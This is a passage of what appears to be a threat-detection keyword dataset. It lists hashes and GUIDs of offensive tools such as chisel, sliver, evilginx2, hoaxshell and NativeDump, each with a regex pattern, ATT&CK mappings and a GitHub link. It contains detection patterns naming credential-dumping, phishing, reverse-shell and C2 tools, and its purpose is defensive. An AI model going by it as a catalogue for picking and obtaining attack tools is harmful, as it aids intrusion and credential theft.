"*54b2757e66ac5e8173d2af618fed10afc4c3b28d02c6324847c24d8bb17c8a45*",".{0,1000}54b2757e66ac5e8173d2af618fed10afc4c3b28d02c6324847c24d8bb17c8a45.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*54db0c7311eba1f9c32da2b1d0b9401117493a9b8bd58814e1cdb62239151204*",".{0,1000}54db0c7311eba1f9c32da2b1d0b9401117493a9b8bd58814e1cdb62239151204.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*550168d7c4f722b95288f8402f9ac3422dbbae250a3f36e3a10a985ac7f1c84a*",".{0,1000}550168d7c4f722b95288f8402f9ac3422dbbae250a3f36e3a10a985ac7f1c84a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*55049f7690abbbb5c8dc844e54b63269d111c0cd21e98854c666a27788dc5de6*",".{0,1000}55049f7690abbbb5c8dc844e54b63269d111c0cd21e98854c666a27788dc5de6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*55096accdcb71eb43edd3001d4f6ec9c40ea88d448ba9d845782ff8e70df2fb3*",".{0,1000}55096accdcb71eb43edd3001d4f6ec9c40ea88d448ba9d845782ff8e70df2fb3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*55199d5089be9072f5e556c5bb2fc11a3644fec2e652883e2b4da20e851552df*",".{0,1000}55199d5089be9072f5e556c5bb2fc11a3644fec2e652883e2b4da20e851552df.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5529ff4b4c60d1cfefb02f145e149ffb166229e03aff4d8917340190753cde9e*",".{0,1000}5529ff4b4c60d1cfefb02f145e149ffb166229e03aff4d8917340190753cde9e.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5*",".{0,1000}555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*555AD0AC-1FDB-4016-8257-170A74CB2F55*",".{0,1000}555AD0AC\-1FDB\-4016\-8257\-170A74CB2F55.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*555AD0AC-1FDB-4016-8257-170A74CB2F55*",".{0,1000}555AD0AC\-1FDB\-4016\-8257\-170A74CB2F55.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*55652291077fbb6c957ea42379d965892e29695a85ce00844c7b1c83971ac1e6*",".{0,1000}55652291077fbb6c957ea42379d965892e29695a85ce00844c7b1c83971ac1e6.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*5571bc0232f7f7911042503b2a2224ad420788d999eb819257a00943928a56bb*",".{0,1000}5571bc0232f7f7911042503b2a2224ad420788d999eb819257a00943928a56bb.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*558a73bf1f4a3ecc59133a10d1a7892712f2bd30326f86a12d5c7060274d734d*",".{0,1000}558a73bf1f4a3ecc59133a10d1a7892712f2bd30326f86a12d5c7060274d734d.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*558df705dd4b6213c11e858b7c32960eaec39360*",".{0,1000}558df705dd4b6213c11e858b7c32960eaec39360.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*559917334e8dd6e6828011019d20c15f23ab49a9747a08aaca275c6d44a5d811*",".{0,1000}559917334e8dd6e6828011019d20c15f23ab49a9747a08aaca275c6d44a5d811.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*559e5ff2b8afb25bbc62275355ba2ceb668e8707de6b221315afb6c2390ba68e*",".{0,1000}559e5ff2b8afb25bbc62275355ba2ceb668e8707de6b221315afb6c2390ba68e.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*55a3bbb8a62578b455e478cb197aadd389f2e65418595e5df4636972be878710*",".{0,1000}55a3bbb8a62578b455e478cb197aadd389f2e65418595e5df4636972be878710.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*55A48A19-1A5C-4E0D-A46A-5DB04C1D8B03*",".{0,1000}55A48A19\-1A5C\-4E0D\-A46A\-5DB04C1D8B03.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*55abc5a3fcc9e06b848f9d81d93ed2771947d01491f99ef3f55556f5b2a183ef*",".{0,1000}55abc5a3fcc9e06b848f9d81d93ed2771947d01491f99ef3f55556f5b2a183ef.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*55ac39fc6d45b2e315df43a71380ca8c20e62e28b9531e56d920e6f45103388d*",".{0,1000}55ac39fc6d45b2e315df43a71380ca8c20e62e28b9531e56d920e6f45103388d.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*55e9c45179e5688405513330884f614cc9d97b9bef74ea64c3c6d8dd992a7e9c*",".{0,1000}55e9c45179e5688405513330884f614cc9d97b9bef74ea64c3c6d8dd992a7e9c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*55F0368B-63DA-40E7-A8A5-289F70DF9C7F*",".{0,1000}55F0368B\-63DA\-40E7\-A8A5\-289F70DF9C7F.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","0","N/A","9","2","157","24","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" "*55f8bbbb112a0bf874c09d9a908fa42773bbc0d9ce3495bb2496b60900e7f09a*",".{0,1000}55f8bbbb112a0bf874c09d9a908fa42773bbc0d9ce3495bb2496b60900e7f09a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*564967ff2524b78c74c3a7d3b31fd7bdc0750c6c478fb15c571fe7fdc82e31a2*",".{0,1000}564967ff2524b78c74c3a7d3b31fd7bdc0750c6c478fb15c571fe7fdc82e31a2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*56633694db3e8d8f7022bbc09920592e414c90155e273fbea96b6299bab97275*",".{0,1000}56633694db3e8d8f7022bbc09920592e414c90155e273fbea96b6299bab97275.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*566e27a6f2a96e268b6f21b88db8f3488739b0d780e82ac516b3ee14c5fc337f*",".{0,1000}566e27a6f2a96e268b6f21b88db8f3488739b0d780e82ac516b3ee14c5fc337f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5696de366805239d730793f8bcb78d54bc2e8c07f06795e089dcfc8f6fed8184*",".{0,1000}5696de366805239d730793f8bcb78d54bc2e8c07f06795e089dcfc8f6fed8184.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*56cfc4ef19c92043b59bb88846ffd69725df417bd4c7adf14aa11e29a9428acc*",".{0,1000}56cfc4ef19c92043b59bb88846ffd69725df417bd4c7adf14aa11e29a9428acc.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*56d4452909e80c00ed7a13c08ab27673b286a16d9b083a516edb7f45dbc0c4be*",".{0,1000}56d4452909e80c00ed7a13c08ab27673b286a16d9b083a516edb7f45dbc0c4be.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*56e11018851e99a4fc3492eed467f1ed59fd663b366b49610f2b5c9b891b167a*",".{0,1000}56e11018851e99a4fc3492eed467f1ed59fd663b366b49610f2b5c9b891b167a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*56f4763af00801c5eb80c39f141a563069669def9f98c1798c0f4b4094f34821*",".{0,1000}56f4763af00801c5eb80c39f141a563069669def9f98c1798c0f4b4094f34821.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*56F981FD-634A-4656-85A7-5636658E1F94*",".{0,1000}56F981FD\-634A\-4656\-85A7\-5636658E1F94.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*5721ff8bccba2fec3918c3464b519d9b02b69f0cc69639eaa8964174d4cc6e36*",".{0,1000}5721ff8bccba2fec3918c3464b519d9b02b69f0cc69639eaa8964174d4cc6e36.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*5738fd3f47fb386d8cf45ff598545140f51b3b6507fa549dafc43c51dd27488f*",".{0,1000}5738fd3f47fb386d8cf45ff598545140f51b3b6507fa549dafc43c51dd27488f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*573ea06d067eeed688c7bc60b367e0b47059a6af03ad5b4d53bb90549894a0bd*",".{0,1000}573ea06d067eeed688c7bc60b367e0b47059a6af03ad5b4d53bb90549894a0bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5740d6067561fcd27239374abbfd7076d3df5909b107a32bbb2e9eec0e9f4d61*",".{0,1000}5740d6067561fcd27239374abbfd7076d3df5909b107a32bbb2e9eec0e9f4d61.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5751db8dd5b4407b720b3bea4b8e33b560a8f0879318bb3327bd7e4f102af12a*",".{0,1000}5751db8dd5b4407b720b3bea4b8e33b560a8f0879318bb3327bd7e4f102af12a.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*57630a0b38ad185ff8a8d0706ff9cebfd12f47526ceeeb90cc3a17e124316fe2*",".{0,1000}57630a0b38ad185ff8a8d0706ff9cebfd12f47526ceeeb90cc3a17e124316fe2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*578a42cf90cf1bcc569f925d7909bbedd2756367906d2875a23cbc8bb1628577*",".{0,1000}578a42cf90cf1bcc569f925d7909bbedd2756367906d2875a23cbc8bb1628577.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*578bd74856cec7caa02f5f6c53d9412e06bc7eefd6c5213ee8f767a91d88c4c9*",".{0,1000}578bd74856cec7caa02f5f6c53d9412e06bc7eefd6c5213ee8f767a91d88c4c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*579ba94b0bffde7e8308bae8f7ba129e47f7e36a3ed7e57ce0454d01629c2baa*",".{0,1000}579ba94b0bffde7e8308bae8f7ba129e47f7e36a3ed7e57ce0454d01629c2baa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*57a0a978ab19598abf7185762834fef1b4dbd4db30d2fb85d411a0e22821df25*",".{0,1000}57a0a978ab19598abf7185762834fef1b4dbd4db30d2fb85d411a0e22821df25.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*57A893C7-7527-4B55-B4E9-D644BBDA89D1*",".{0,1000}57A893C7\-7527\-4B55\-B4E9\-D644BBDA89D1.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*57bdf28c39480b3e91fd8e433dce4c9f032447f9bf1947a7b8362645ad213732*",".{0,1000}57bdf28c39480b3e91fd8e433dce4c9f032447f9bf1947a7b8362645ad213732.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*57c646df3c07792d9c6e479b7faa5ccd7802dc03dc49e477534e2322cb753bf9*",".{0,1000}57c646df3c07792d9c6e479b7faa5ccd7802dc03dc49e477534e2322cb753bf9.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","0","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z" "*57D4D4F4-F083-47A3-AE33-AE2500ABA3B6*",".{0,1000}57D4D4F4\-F083\-47A3\-AE33\-AE2500ABA3B6.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*57d785125cf62ffdb727ac7f56110dc0ab0403f033caf958b717fc93f963f097*",".{0,1000}57d785125cf62ffdb727ac7f56110dc0ab0403f033caf958b717fc93f963f097.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default 